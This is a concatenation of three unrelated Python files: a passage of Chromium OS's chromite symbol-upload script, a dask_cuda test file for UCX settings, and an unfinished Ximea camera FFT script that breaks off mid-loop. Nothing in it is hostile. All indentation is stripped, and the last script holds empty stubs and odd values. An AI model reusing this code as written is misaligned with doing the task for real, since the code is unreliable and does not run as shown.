crashes on non-release builds (in which case try to only upload the symbols
for those executables involved).
"""
from __future__ import print_function
import ctypes
import datetime
import errno
import functools
import hashlib
import httplib
import multiprocessing
import os
import poster
try:
import Queue
except ImportError:
# Python-3 renamed to "queue". We still use Queue to avoid collisions
# with naming variables as "queue". Maybe we'll transition at some point.
# pylint: disable=F0401
import queue as Queue
import random
import signal
import socket
import textwrap
import tempfile
import time
import urllib2
import urlparse
from chromite.cbuildbot import constants
from chromite.lib import cache
from chromite.lib import commandline
from chromite.lib import cros_build_lib
from chromite.lib import gs
from chromite.lib import osutils
from chromite.lib import parallel
from chromite.lib import retry_util
from chromite.lib import signals
from chromite.lib import timeout_util
from chromite.scripts import cros_generate_breakpad_symbols
# Needs to be after chromite imports.
# TODO(build): When doing the initial buildbot bootstrap, we won't have any
# other repos available. So ignore isolateserver imports. But buildbot will
# re-exec itself once it has done a full repo sync and then the module will
# be available -- it isn't needed that early. http://crbug.com/341152
try:
import isolateserver
except ImportError:
isolateserver = None
# URLs used for uploading symbols.
OFFICIAL_UPLOAD_URL = 'http://clients2.google.com/cr/symbol'
STAGING_UPLOAD_URL = 'http://clients2.google.com/cr/staging_symbol'
# The crash server rejects files that are this big.
CRASH_SERVER_FILE_LIMIT = 350 * 1024 * 1024
# Give ourselves a little breathing room from what the server expects.
DEFAULT_FILE_LIMIT = CRASH_SERVER_FILE_LIMIT - (10 * 1024 * 1024)
# The batch limit when talking to the dedup server. We avoid sending one at a
# time as the round trip overhead will dominate. Conversely, we avoid sending
# all at once so we can start uploading symbols asap -- the symbol server is a
# bit slow and will take longer than anything else.
# TODO: A better algorithm would be adaptive. If we have more than one symbol
# in the upload queue waiting, we could send more symbols to the dedupe server
# at a time.
DEDUPE_LIMIT = 100
# How long to wait for the server to respond with the results. Note that the
# larger the limit above, the larger this will need to be. So we give it ~1
# second per item max.
DEDUPE_TIMEOUT = DEDUPE_LIMIT
# How long to wait for the notification to finish (in minutes). If it takes
# longer than this, we'll stop notifying, but that's not a big deal as we
# will be able to recover in later runs.
DEDUPE_NOTIFY_TIMEOUT = 20
# The unique namespace in the dedupe server that only we use. Helps avoid
# collisions with all the hashed values and unrelated content.
OFFICIAL_DEDUPE_NAMESPACE = 'chromium-os-upload-symbols'
STAGING_DEDUPE_NAMESPACE = '%s-staging' % OFFICIAL_DEDUPE_NAMESPACE
# How long to wait (in seconds) for a single upload to complete. This has
# to allow for symbols that are up to CRASH_SERVER_FILE_LIMIT in size.
UPLOAD_TIMEOUT = 30 * 60
# Sleep for 200ms in between uploads to avoid DoS'ing symbol server.
DEFAULT_SLEEP_DELAY = 0.2
# Number of seconds to wait before retrying an upload. The delay will double
# for each subsequent retry of the same symbol file.
INITIAL_RETRY_DELAY = 1
# Allow up to 7 attempts to upload a symbol file (total delay may be
# 1+2+4+8+16+32=63 seconds).
MAX_RETRIES = 6
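# (Illustrative restatement of the comment above: the worst-case extra delay is
#  sum(INITIAL_RETRY_DELAY * 2**i for i in range(MAX_RETRIES)) == 63 seconds.)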
# Number of total errors, before uploads are no longer attempted.
# This is used to avoid lots of errors causing unreasonable delays.
# See the related, but independent, error values below.
MAX_TOTAL_ERRORS_FOR_RETRY = 30
# A watermark of transient errors which we allow recovery from. If we hit
# errors infrequently, overall we're probably doing fine. For example, if
# we have one failure every 100 passes, then we probably don't want to fail
# right away. But if we hit a string of failures in a row, we want to abort.
#
# The watermark starts at 0 (and can never go below that). When this error
# level is exceeded, we stop uploading. When a failure happens, we add the
# fail adjustment, and when an upload succeeds, we add the pass adjustment.
# We want to penalize failures more so that we ramp up when there is a string
# of them, but then slowly back off as things start working.
#
# A quick example:
# 0.0: Starting point.
# 0.0: Upload works, so add -0.5, and then clamp to 0.
# 1.0: Upload fails, so add 1.0.
# 2.0: Upload fails, so add 1.0.
# 1.5: Upload works, so add -0.5.
# 1.0: Upload works, so add -0.5.
ERROR_WATERMARK = 3.0
ERROR_ADJUST_FAIL = 1.0
ERROR_ADJUST_PASS = -0.5
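# Illustrative sketch (not part of the original upload flow): a clamped
# accumulator reproducing the walk-through above. The helper name and its
# argument are hypothetical; the real code applies the same arithmetic via
# _UpdateCounter() and checks the level in ErrorLimitHit().
def _DemoErrorWatermark(upload_results):
  """Return the watermark level after a sequence of pass(True)/fail(False)."""
  level = 0.0
  for passed in upload_results:
    adj = ERROR_ADJUST_PASS if passed else ERROR_ADJUST_FAIL
    level = max(0.0, level + adj)
  return level
# e.g. _DemoErrorWatermark([True, False, False, True, True]) == 1.0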
def SymUpload(upload_url, sym_item):
"""Upload a symbol file to a HTTP server
The upload is a multipart/form-data POST with the following parameters:
code_file: the basename of the module, e.g. "app"
code_identifier: the module file's identifier
debug_file: the basename of the debugging file, e.g. "app"
debug_identifier: the debug file's identifier, usually consisting of
the guid and age embedded in the pdb, e.g.
"11111111BBBB3333DDDD555555555555F"
version: the file version of the module, e.g. "1.2.3.4"
product: HTTP-friendly product name
os: the operating system that the module was built for
cpu: the CPU that the module was built for
symbol_file: the contents of the breakpad-format symbol file
Args:
upload_url: The crash URL to POST the |sym_file| to
sym_item: A SymbolItem containing the path to the breakpad symbol to upload
"""
sym_header = sym_item.sym_header
sym_file = sym_item.sym_file
fields = (
('code_file', sym_header.name),
('debug_file', sym_header.name),
('debug_identifier', sym_header.id.replace('-', '')),
# The product/version fields are used by the server only for statistic
# purposes. They do not impact symbolization, so they're safe to set
# to any value all the time.
# In this case, we use it to help see the load our build system is
# placing on the server.
# Not sure what to set for the version. Maybe the git sha1 of this file.
# Note: the server restricts this to 30 chars.
#('version', None),
('product', 'ChromeOS'),
('os', sym_header.os),
('cpu', sym_header.cpu),
poster.encode.MultipartParam.from_file('symbol_file', sym_file),
)
data, headers = poster.encode.multipart_encode(fields)
request = urllib2.Request(upload_url, data, headers)
request.add_header('User-agent', 'chromite.upload_symbols')
urllib2.urlopen(request, timeout=UPLOAD_TIMEOUT)
def TestingSymUpload(upload_url, sym_item):
"""A stub version of SymUpload for --testing usage"""
cmd = ['sym_upload', sym_item.sym_file, upload_url]
# Randomly fail 80% of the time (the retry logic makes this 80%/3 per file).
returncode = random.randint(1, 100) <= 80
cros_build_lib.Debug('would run (and return %i): %s', returncode,
cros_build_lib.CmdToStr(cmd))
if returncode:
output = 'Failed to send the symbol file.'
else:
output = 'Successfully sent the symbol file.'
result = cros_build_lib.CommandResult(cmd=cmd, error=None, output=output,
returncode=returncode)
if returncode:
exceptions = (
socket.error('[socket.error] forced test fail'),
httplib.BadStatusLine('[BadStatusLine] forced test fail'),
urllib2.HTTPError(upload_url, 400, '[HTTPError] forced test fail',
{}, None),
urllib2.URLError('[URLError] forced test fail'),
)
raise random.choice(exceptions)
else:
return result
def ErrorLimitHit(num_errors, watermark_errors):
"""See if our error limit has been hit
Args:
num_errors: A multiprocessing.Value of the raw number of failures.
watermark_errors: A multiprocessing.Value of the current rate of failures.
Returns:
True if our error limits have been exceeded.
"""
return ((num_errors is not None and
num_errors.value > MAX_TOTAL_ERRORS_FOR_RETRY) or
(watermark_errors is not None and
watermark_errors.value > ERROR_WATERMARK))
def _UpdateCounter(counter, adj):
"""Update |counter| by |adj|
Handle atomic updates of |counter|. Also make sure it does not
fall below 0.
Args:
counter: A multiprocessing.Value to update
adj: The value to add to |counter|
"""
def _Update():
clamp = 0 if type(adj) is int else 0.0
counter.value = max(clamp, counter.value + adj)
if hasattr(counter, 'get_lock'):
with counter.get_lock():
_Update()
elif counter is not None:
_Update()
def UploadSymbol(upload_url, sym_item, file_limit=DEFAULT_FILE_LIMIT,
sleep=0, num_errors=None, watermark_errors=None,
failed_queue=None, passed_queue=None):
"""Upload |sym_item| to |upload_url|
Args:
upload_url: The crash server to upload things to
sym_item: A SymbolItem containing the path to the breakpad symbol to upload
file_limit: The max file size of a symbol file before we try to strip it
sleep: Number of seconds to sleep before running
num_errors: An object to update with the error count (needs a .value member)
watermark_errors: An object to track current error behavior (needs a .value)
failed_queue: When a symbol fails, add it to this queue
passed_queue: When a symbol passes, add it to this queue
Returns:
The number of errors that were encountered.
"""
sym_file = sym_item.sym_file
upload_item = sym_item
if num_errors is None:
num_errors = ctypes.c_int()
if ErrorLimitHit(num_errors, watermark_errors):
# Abandon ship! It's on fire! NOoooooooooooOOOoooooo.
if failed_queue:
failed_queue.put(sym_file)
return 0
if sleep:
# Keeps us from DoS-ing the symbol server.
time.sleep(sleep)
cros_build_lib.Debug('uploading %s' % sym_file)
# Ideally there'd be a tempfile.SpooledNamedTemporaryFile that we could use.
with tempfile.NamedTemporaryFile(prefix='upload_symbols',
bufsize=0) as temp_sym_file:
if file_limit:
# If the symbols size is too big, strip out the call frame info. The CFI
# is unnecessary for 32bit x86 targets where the frame pointer is used (as
# all of ours have) and it accounts for over half the size of the symbols
# uploaded.
file_size = os.path.getsize(sym_file)
if file_size > file_limit:
cros_build_lib.Warning('stripping CFI from %s due to size %s > %s',
sym_file, file_size, file_limit)
temp_sym_file.writelines([x for x in open(sym_file, 'rb').readlines()
if not x.startswith('STACK CFI')])
upload_item = FakeItem(sym_file=temp_sym_file.name,
sym_header=sym_item.sym_header)
# Hopefully the crash server will let it through. But it probably won't.
# Not sure what the best answer is in this case.
file_size = os.path.getsize(upload_item.sym_file)
if file_size > CRASH_SERVER_FILE_LIMIT:
cros_build_lib.PrintBuildbotStepWarnings()
cros_build_lib.Warning('upload file %s is awfully large, risking '
'rejection by the symbol server (%s > %s)',
sym_file, file_size, CRASH_SERVER_FILE_LIMIT)
# Upload the symbol file.
success = False
try:
cros_build_lib.TimedCommand(
retry_util.RetryException,
(urllib2.HTTPError, urllib2.URLError), MAX_RETRIES, SymUpload,
upload_url, upload_item, sleep=INITIAL_RETRY_DELAY,
timed_log_msg='upload of %10i bytes took %%s: %s' %
(file_size, os.path.basename(sym_file)))
success = True
if passed_queue:
passed_queue.put(sym_item)
except urllib2.HTTPError as e:
cros_build_lib.Warning('could not upload: %s: HTTP %s: %s',
os.path.basename(sym_file), e.code, e.reason)
except (urllib2.URLError, httplib.HTTPException, socket.error) as e:
cros_build_lib.Warning('could not upload: %s: %s',
os.path.basename(sym_file), e)
finally:
if success:
_UpdateCounter(watermark_errors, ERROR_ADJUST_PASS)
else:
_UpdateCounter(num_errors, 1)
_UpdateCounter(watermark_errors, ERROR_ADJUST_FAIL)
if failed_queue:
failed_queue.put(sym_file)
return num_errors.value
# A dummy class that allows for stubbing in tests and SymUpload.
FakeItem = cros_build_lib.Collection(
'FakeItem', sym_file=None, sym_header=None, content=lambda x: '')
# TODO(build): Delete this if check. http://crbug.com/341152
if isolateserver:
class SymbolItem(isolateserver.BufferItem):
"""Turn a sym_file into an isolateserver.Item"""
ALGO = hashlib.sha1
def __init__(self, sym_file):
sym_header = cros_generate_breakpad_symbols.ReadSymsHeader(sym_file)
super(SymbolItem, self).__init__(str(sym_header), self.ALGO)
self.sym_header = sym_header
self.sym_file = sym_file
def SymbolDeduplicatorNotify(dedupe_namespace, dedupe_queue):
"""Send a symbol file to the swarming service
Notify the swarming service of a successful upload. If the notification fails
for any reason, we ignore it. We don't care as it just means we'll upload it
again later on, and the symbol server will handle that graciously.
This func runs in a different process from the main one, so we cannot share
the storage object. Instead, we create our own. This func stays alive for
the life of the process, so we only create one here overall.
Args:
dedupe_namespace: The isolateserver namespace to dedupe uploaded symbols.
dedupe_queue: The queue to read SymbolItems from
"""
if dedupe_queue is None:
return
item = None
try:
with timeout_util.Timeout(DEDUPE_TIMEOUT):
storage = isolateserver.get_storage_api(constants.ISOLATESERVER,
dedupe_namespace)
for item in iter(dedupe_queue.get, None):
with timeout_util.Timeout(DEDUPE_TIMEOUT):
cros_build_lib.Debug('sending %s to dedupe server', item.sym_file)
storage.push(item, item.content(0))
cros_build_lib.Debug('sent %s', item.sym_file)
cros_build_lib.Info('dedupe notification finished; exiting')
except Exception:
sym_file = item.sym_file if (item and item.sym_file) else ''
cros_build_lib.Warning('posting %s to dedupe server failed',
os.path.basename(sym_file), exc_info=True)
# Keep draining the queue though so it doesn't fill up.
while dedupe_queue.get() is not None:
continue
def SymbolDeduplicator(storage, sym_paths):
"""Filter out symbol files that we've already uploaded
Using the swarming service, ask it to tell us which symbol files we've already
uploaded in previous runs and/or by other bots. If the query fails for any
reason, we'll just upload all symbols. This is fine as the symbol server will
do the right thing and this phase is purely an optimization.
This code runs in the main thread which is why we can re-use the existing
storage object. Saves us from having to recreate one all the time.
Args:
storage: An isolateserver.StorageApi object
sym_paths: List of symbol files to check against the dedupe server
Returns:
List of symbol files that have not been uploaded before
"""
if not sym_paths:
return sym_paths
items = [SymbolItem(x) for x in sym_paths]
if storage:
try:
with timeout_util.Timeout(DEDUPE_TIMEOUT):
items = storage.contains(items)
except Exception:
cros_build_lib.Warning('talking to dedupe server failed', exc_info=True)
return items
def IsTarball(path):
"""Guess if this is a tarball based on the filename."""
parts = path.split('.')
if len(parts) <= 1:
return False
if parts[-1] == 'tar':
return True
if parts[-2] == 'tar':
return parts[-1] in ('bz2', 'gz', 'xz')
return parts[-1] in ('tbz2', 'tbz', 'tgz', 'txz')
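# For instance (illustrative only, not exercised by this script):
#   IsTarball('symbols.tar.xz')  -> True
#   IsTarball('symbols.tgz')     -> True
#   IsTarball('app.sym')         -> False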
def SymbolFinder(tempdir, paths):
"""Locate symbol files in |paths|
Args:
tempdir: Path to use for temporary files (caller will clean up).
paths: A list of input paths to walk. Files are returned w/out any checks.
Dirs are searched for files that end in ".sym". Urls are fetched and then
processed. Tarballs are unpacked and walked.
Returns:
Yield every viable sym file.
"""
for p in paths:
# Pylint is confused about members of ParseResult.
o = urlparse.urlparse(p)
if o.scheme: # pylint: disable=E1101
# Support globs of filenames.
ctx = gs.GSContext()
for p in ctx.LS(p):
cros_build_lib.Info('processing files inside %s', p)
o = urlparse.urlparse(p)
cache_dir = commandline.GetCacheDir()
common_path = os.path.join(cache_dir, constants.COMMON_CACHE)
tar_cache = cache.TarballCache(common_path)
key = ('%s%s' % (o.netloc, o.path)).split('/') # pylint: disable=E1101
# The common cache will not be LRU, removing the need to hold a read
# lock on the cached gsutil.
ref = tar_cache.Lookup(key)
try:
ref.SetDefault(p)
except cros_build_lib.RunCommandError as e:
cros_build_lib.Warning('ignoring %s\n%s', p, e)
continue
for p in SymbolFinder(tempdir, [ref.path]):
yield p
elif os.path.isdir(p):
for root, _, files in os.walk(p):
for f in files:
if f.endswith('.sym'):
yield os.path.join(root, f)
elif IsTarball(p):
cros_build_lib.Info('processing files inside %s', p)
tardir = tempfile.mkdtemp(dir=tempdir)
cache.Untar(os.path.realpath(p), tardir)
for p in SymbolFinder(tardir, [tardir]):
yield p
else:
yield p
def WriteQueueToFile(listing, queue, relpath=None):
"""Write all the items in |queue| to the |listing|.
Note: The queue must have a sentinel None appended to the end.
Args:
listing: Where to write out the list of files.
queue: The queue of paths to drain.
relpath: If set, write out paths relative to this one.
"""
if not listing:
# Still drain the queue so we make sure the producer has finished
# before we return. Otherwise, the queue might get destroyed too
# quickly which will trigger a traceback in the producer.
while queue.get() is not None:
continue
return
with cros_build_lib.Open(listing, 'wb+') as f:
while True:
path = queue.get()
if path is None:
return
if relpath:
path = os.path.relpath(path, relpath)
f.write('%s\n' % path)
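# Typical WriteQueueToFile call pattern (illustrative; mirrors the usage further
# below): the producer appends the sentinel before handing the queue over, e.g.
#   failed_queue.put(None)
#   WriteQueueToFile(failed_list, failed_queue, breakpad_dir)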
def UploadSymbols(board=None, official=False, breakpad_dir=None,
file_limit=DEFAULT_FILE_LIMIT, sleep=DEFAULT_SLEEP_DELAY,
upload_limit=None, sym_paths=None, failed_list=None,
root=None, retry=True, dedupe_namespace=None):
"""Upload all the generated symbols for |board| to the crash server
  You can use it in a few ways:
* pass |board| to locate all of its symbols
* pass |breakpad_dir| to upload all the symbols in there
* pass |sym_paths| to upload specific symbols (or dirs of symbols)
Args:
board: The board whose symbols we wish to upload
official: Use the official symbol server rather than the staging one
breakpad_dir: The full path to the breakpad directory where symbols live
file_limit: The max file size of a symbol file before we try to strip it
sleep: How long to sleep in between uploads
upload_limit: If set, only upload this many symbols (meant for testing)
sym_paths: Specific symbol files (or dirs of sym files) to upload,
otherwise search |breakpad_dir|
failed_list: Write the names of all sym files we did not upload; can be a
filename or file-like object.
root: The tree to prefix to |breakpad_dir| (if |breakpad_dir| is not set)
retry: Whether we should retry failures.
dedupe_namespace: The isolateserver namespace to dedupe uploaded symbols.
Returns:
The number of errors that were encountered.
"""
# TODO(build): Delete this assert.
assert isolateserver, 'Missing isolateserver import http://crbug.com/341152'
if official:
upload_url = OFFICIAL_UPLOAD_URL
else:
cros_build_lib.Warning('unofficial builds upload to the staging server')
upload_url = STAGING_UPLOAD_URL
if sym_paths:
cros_build_lib.Info('uploading specified symbols to %s', upload_url)
else:
if breakpad_dir is None:
breakpad_dir = os.path.join(
root,
cros_generate_breakpad_symbols.FindBreakpadDir(board).lstrip('/'))
cros_build_lib.Info('uploading all symbols to %s from %s', upload_url,
breakpad_dir)
sym_paths = [breakpad_dir]
# We use storage_query to ask the server about existing symbols. The
# storage_notify_proc process is used to post updates to the server. We
# cannot safely share the storage object between threads/processes, but
# we also want to minimize creating new ones as each object has to init
# new state (like server connections).
storage_query = None
if dedupe_namespace:
dedupe_limit = DEDUPE_LIMIT
dedupe_queue = multiprocessing.Queue()
try:
with timeout_util.Timeout(DEDUPE_TIMEOUT):
storage_query = isolateserver.get_storage_api(constants.ISOLATESERVER,
dedupe_namespace)
except Exception:
cros_build_lib.Warning('initializing dedupe server connection failed',
exc_info=True)
else:
dedupe_limit = 1
dedupe_queue = None
# Can't use parallel.BackgroundTaskRunner because that'll create multiple
# processes and we want only one the whole time (see comment above).
storage_notify_proc = multiprocessing.Process(
target=SymbolDeduplicatorNotify, args=(dedupe_namespace, dedupe_queue))
bg_errors = multiprocessing.Value('i')
watermark_errors = multiprocessing.Value('f')
failed_queue = multiprocessing.Queue()
uploader = functools.partial(
UploadSymbol, upload_url, file_limit=file_limit, sleep=sleep,
num_errors=bg_errors, watermark_errors=watermark_errors,
failed_queue=failed_queue, passed_queue=dedupe_queue)
start_time = datetime.datetime.now()
Counters = cros_build_lib.Collection(
'Counters', upload_limit=upload_limit, uploaded_count=0, deduped_count=0)
counters = Counters()
def _Upload(queue, counters, files):
if not files:
return
missing_count = 0
for item in SymbolDeduplicator(storage_query, files):
missing_count += 1
if counters.upload_limit == 0:
continue
queue.put((item,))
counters.uploaded_count += 1
if counters.upload_limit is not None:
counters.upload_limit -= 1
counters.deduped_count += (len(files) - missing_count)
try:
storage_notify_proc.start()
with osutils.TempDir(prefix='upload_symbols.') as tempdir:
# For the first run, we collect the symbols that failed. If the
# overall failure rate was low, we'll retry them on the second run.
for retry in (retry, False):
# We need to limit ourselves to one upload at a time to avoid the server
# kicking in DoS protection. See these bugs for more details:
# http://crbug.com/209442
# http://crbug.com/212496
with parallel.BackgroundTaskRunner(uploader, processes=1) as queue:
dedupe_list = []
for sym_file in SymbolFinder(tempdir, sym_paths):
dedupe_list.append(sym_file)
dedupe_len = len(dedupe_list)
if dedupe_len < dedupe_limit:
if (counters.upload_limit is None or
dedupe_len < counters.upload_limit):
continue
# We check the counter before _Upload so that we don't keep talking
# to the dedupe server. Otherwise, we end up sending one symbol at
# a time to it and that slows things down a lot.
if counters.upload_limit == 0:
break
_Upload(queue, counters, dedupe_list)
dedupe_list = []
_Upload(queue, counters, dedupe_list)
# See if we need to retry, and if we haven't failed too many times yet.
if not retry or ErrorLimitHit(bg_errors, watermark_errors):
break
sym_paths = []
failed_queue.put(None)
while True:
sym_path = failed_queue.get()
if sym_path is None:
break
sym_paths.append(sym_path)
if sym_paths:
cros_build_lib.Warning('retrying %i symbols', len(sym_paths))
if counters.upload_limit is not None:
counters.upload_limit += len(sym_paths)
# Decrement the error count in case we recover in the second pass.
assert bg_errors.value >= len(sym_paths), \
'more failed files than errors?'
bg_errors.value -= len(sym_paths)
else:
# No failed symbols, so just return now.
break
# If the user has requested it, save all the symbol files that we failed to
# upload to a listing file. This should help with recovery efforts later.
failed_queue.put(None)
WriteQueueToFile(failed_list, failed_queue, breakpad_dir)
finally:
cros_build_lib.Info('finished uploading; joining background process')
if dedupe_queue:
dedupe_queue.put(None)
# The notification might be slow going, so give it some time to finish.
# We have to poll here as the process monitor is watching for output and
# will kill us if we go silent for too long.
wait_minutes = DEDUPE_NOTIFY_TIMEOUT
while storage_notify_proc.is_alive() and wait_minutes > 0:
if dedupe_queue:
qsize = str(dedupe_queue.qsize())
else:
qsize = '[None]'
cros_build_lib.Info('waiting up to %i minutes for ~%s notifications',
wait_minutes, qsize)
storage_notify_proc.join(60)
wait_minutes -= 1
# The process is taking too long, so kill it and complain.
if storage_notify_proc.is_alive():
cros_build_lib.Warning('notification process took too long')
cros_build_lib.PrintBuildbotStepWarnings()
# Kill it gracefully first (traceback) before tacking it down harder.
pid = storage_notify_proc.pid
for sig in (signal.SIGINT, signal.SIGTERM, signal.SIGKILL):
cros_build_lib.Warning('sending %s to %i', signals.StrSignal(sig), pid)
# The process might have exited between the last check and the
# actual kill below, so ignore ESRCH errors.
try:
os.kill(pid, sig)
except OSError as e:
if e.errno == errno.ESRCH:
break
else:
raise
time.sleep(5)
if not storage_notify_proc.is_alive():
break
# Drain the queue so we don't hang when we finish.
try:
cros_build_lib.Warning('draining the notify queue manually')
with timeout_util.Timeout(60):
try:
while dedupe_queue.get_nowait():
pass
except Queue.Empty:
pass
except timeout_util.TimeoutError:
cros_build_lib.Warning('draining the notify queue failed; trashing it')
dedupe_queue.cancel_join_thread()
cros_build_lib.Info('uploaded %i symbols (%i were deduped) which took: %s',
counters.uploaded_count, counters.deduped_count,
datetime.datetime.now() - start_time)
return bg_errors.value
def main(argv):
# TODO(build): Delete this assert.
assert isolateserver, 'Missing isolateserver import http://crbug.com/341152'
parser = commandline.ArgumentParser(description=__doc__)
parser.add_argument('sym_paths', type='path_or_uri', nargs='*', default=None,
help='symbol file or directory or URL or tarball')
parser.add_argument('--board', default=None,
help='board to build packages for')
parser.add_argument('--breakpad_root', type='path', default=None,
help='root directory for breakpad symbols')
parser.add_argument('--official_build', action='store_true', default=False,
help='point to official symbol server')
parser.add_argument('--regenerate', action='store_true', default=False,
help='regenerate all symbols')
parser.add_argument('--upload-limit', type=int, default=None,
help='only upload # number of symbols')
parser.add_argument('--strip_cfi', type=int,
default=CRASH_SERVER_FILE_LIMIT - (10 * 1024 * 1024),
help='strip CFI data for files above this size')
parser.add_argument('--failed-list', type='path',
help='where to save a list of failed symbols')
parser.add_argument('--dedupe', action='store_true', default=False,
help='use the swarming service to avoid re-uploading')
parser.add_argument('--testing', action='store_true', default=False,
help='run in testing mode')
parser.add_argument('--yes', action='store_true', default=False,
help='answer yes to all prompts')
opts = parser.parse_args(argv)
opts.Freeze()
if opts.sym_paths:
if opts.regenerate:
cros_build_lib.Die('--regenerate may not be used with specific files')
else:
if opts.board is None:
cros_build_lib.Die('--board is required')
if opts.breakpad_root and opts.regenerate:
cros_build_lib.Die('--regenerate may not be used with --breakpad_root')
if opts.testing:
# TODO(build): Kill off --testing mode once unittests are up-to-snuff.
cros_build_lib.Info('running in testing mode')
# pylint: disable=W0601,W0603
global INITIAL_RETRY_DELAY, SymUpload, DEFAULT_SLEEP_DELAY
INITIAL_RETRY_DELAY = DEFAULT_SLEEP_DELAY = 0
SymUpload = TestingSymUpload
dedupe_namespace = None
if opts.dedupe:
if opts.official_build and not opts.testing:
dedupe_namespace = OFFICIAL_DEDUPE_NAMESPACE
else:
dedupe_namespace = STAGING_DEDUPE_NAMESPACE
if not opts.yes:
prolog = '\n'.join(textwrap.wrap(textwrap.dedent("""
Uploading symbols for an entire Chromium OS build is really only
necessary for release builds and in a few cases for developers
to debug problems. It will take considerable time to run. For
developer debugging purposes, consider instead passing specific
files to upload.
"""), 80)).strip()
if not cros_build_lib.BooleanPrompt(
prompt='Are you sure you want to upload all build symbols',
default=False, prolog=prolog):
cros_build_lib.Die('better safe than sorry')
ret = 0
if opts.regenerate:
ret += cros_generate_breakpad_symbols.GenerateBreakpadSymbols(
opts.board, breakpad_dir=opts.breakpad_root)
ret += UploadSymbols(opts.board, official=opts.official_build,
breakpad_dir=opts.breakpad_root,
file_limit=opts.strip_cfi, sleep=DEFAULT_SLEEP_DELAY,
upload_limit=opts.upload_limit, sym_paths=opts.sym_paths,
failed_list=opts.failed_list,
dedupe_namespace=dedupe_namespace)
if ret:
cros_build_lib.Error('encountered %i problem(s)', ret)
# Since exit(status) gets masked, clamp it to 1 so we don't inadvertently
# return 0 in case we are a multiple of the mask.
ret = 1
return ret
# We need this to run once per process. Do it at module import time as that
# will let us avoid doing it inline at function call time (see SymUpload) as
# that func might be called by the multiprocessing module which means we'll
# do the opener logic multiple times overall. Plus, if you're importing this
# module, it's a pretty good chance that you're going to need this.
poster.streaminghttp.register_openers()
|
test_initialize.py
|
import multiprocessing as mp
import numpy
import psutil
import pytest
from dask import array as da
from distributed import Client
from distributed.deploy.local import LocalCluster
from dask_cuda.initialize import initialize
from dask_cuda.utils import get_ucx_config
mp = mp.get_context("spawn")
ucp = pytest.importorskip("ucp")
# Note: each of the following tests is executed in a new process so
# that the UCX options of the different tests don't conflict.
# Furthermore, all tests do some computation to trigger initialization
# of UCX before retrieving the current config.
def _test_initialize_ucx_tcp():
kwargs = {"enable_tcp_over_ucx": True}
initialize(**kwargs)
with LocalCluster(
protocol="ucx",
dashboard_address=None,
n_workers=1,
threads_per_worker=1,
processes=True,
config={"ucx": get_ucx_config(**kwargs)},
) as cluster:
with Client(cluster) as client:
res = da.from_array(numpy.arange(10000), chunks=(1000,))
res = res.sum().compute()
assert res == 49995000
def check_ucx_options():
conf = ucp.get_config()
assert "TLS" in conf
assert "tcp" in conf["TLS"]
assert "sockcm" in conf["TLS"]
assert "cuda_copy" in conf["TLS"]
assert "sockcm" in conf["SOCKADDR_TLS_PRIORITY"]
return True
assert client.run_on_scheduler(check_ucx_options) is True
assert all(client.run(check_ucx_options).values())
def test_initialize_ucx_tcp():
p = mp.Process(target=_test_initialize_ucx_tcp)
p.start()
p.join()
assert not p.exitcode
def _test_initialize_ucx_nvlink():
kwargs = {"enable_nvlink": True}
initialize(**kwargs)
with LocalCluster(
protocol="ucx",
dashboard_address=None,
n_workers=1,
threads_per_worker=1,
processes=True,
config={"ucx": get_ucx_config(**kwargs)},
) as cluster:
with Client(cluster) as client:
res = da.from_array(numpy.arange(10000), chunks=(1000,))
res = res.sum().compute()
assert res == 49995000
def check_ucx_options():
conf = ucp.get_config()
assert "TLS" in conf
assert "cuda_ipc" in conf["TLS"]
assert "tcp" in conf["TLS"]
assert "sockcm" in conf["TLS"]
assert "cuda_copy" in conf["TLS"]
assert "sockcm" in conf["SOCKADDR_TLS_PRIORITY"]
return True
assert client.run_on_scheduler(check_ucx_options) is True
assert all(client.run(check_ucx_options).values())
def test_initialize_ucx_nvlink():
p = mp.Process(target=_test_initialize_ucx_nvlink)
p.start()
p.join()
assert not p.exitcode
def _test_initialize_ucx_infiniband():
kwargs = {"enable_infiniband": True, "net_devices": "ib0"}
initialize(**kwargs)
with LocalCluster(
protocol="ucx",
dashboard_address=None,
n_workers=1,
threads_per_worker=1,
processes=True,
config={"ucx": get_ucx_config(**kwargs)},
) as cluster:
with Client(cluster) as client:
res = da.from_array(numpy.arange(10000), chunks=(1000,))
res = res.sum().compute()
assert res == 49995000
def check_ucx_options():
conf = ucp.get_config()
assert "TLS" in conf
assert "rc" in conf["TLS"]
assert "tcp" in conf["TLS"]
assert "sockcm" in conf["TLS"]
assert "cuda_copy" in conf["TLS"]
assert "sockcm" in conf["SOCKADDR_TLS_PRIORITY"]
assert conf["NET_DEVICES"] == "ib0"
return True
assert client.run_on_scheduler(check_ucx_options) is True
assert all(client.run(check_ucx_options).values())
@pytest.mark.skipif(
"ib0" not in psutil.net_if_addrs(), reason="Infiniband interface ib0 not found"
)
def test_initialize_ucx_infiniband():
p = mp.Process(target=_test_initialize_ucx_infiniband)
p.start()
p.join()
assert not p.exitcode
|
multithread.py
|
from ximea import xiapi
from imutils.video import FPS
import imutils
import cv2
import numpy as np
from queue import Queue
from threading import Thread
import time
RESIZE = 50000
def worker(input_q, output_q):
fps = FPS().start()
while True:
fps.update()
frame = input_q.get()
frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
###
output = imutils.resize(frame, width=RESIZE, height=RESIZE)
output_q.put(output)
fps.stop()
###### All functions ####
def Mathematics(frame,buffer,stack):
# if not GPU:
frame = np.complex128(frame)
f = np.fft.fft2(frame)
fshift = np.fft.fftshift(f)
magnitude_spectrum = 20*np.log(np.abs(fshift))
    return magnitude_spectrum
def compare_fft():
return
def correlation_coefficient():
return
def gauss_erf(p,x,y):
return y - p[0] * np.exp(-(x-p[1])**2 /(2.0 * p[2]**2))
def gauss_eval(x,p):
return p[0] * np.exp(-(x-p[1])**2 /(2.0 * p[2]**2))
def gaussianFit(X,Y):
return
if __name__ == '__main__':
qu_limit = 1000
threadn = cv2.getNumberOfCPUs() -2
print("Threads : ", threadn)
input_q = Queue(qu_limit) # fps is better if queue is higher but then more lags
output_q = Queue()
for i in range(threadn):
t = Thread(target=worker, args=(input_q, output_q))
t.daemon = True
t.start()
cam = xiapi.Camera()
print('Opening first camera...')
cam.open_device()
cam.set_exposure(1000)
cam.set_param('width',128)
cam.set_param('height',128)
cam.set_param('downsampling_type', 'XI_SKIPPING')
cam.set_acq_timing_mode('XI_ACQ_TIMING_MODE_FREE_RUN')
img = xiapi.Image()
print('Starting data acquisition...')
cam.start_acquisition()
fps = FPS().start()
frame_count = 0
    while frame_count < 10000:
frame_count += 1
cam.get_image(img)
# data_raw = img.get_image_data_raw()
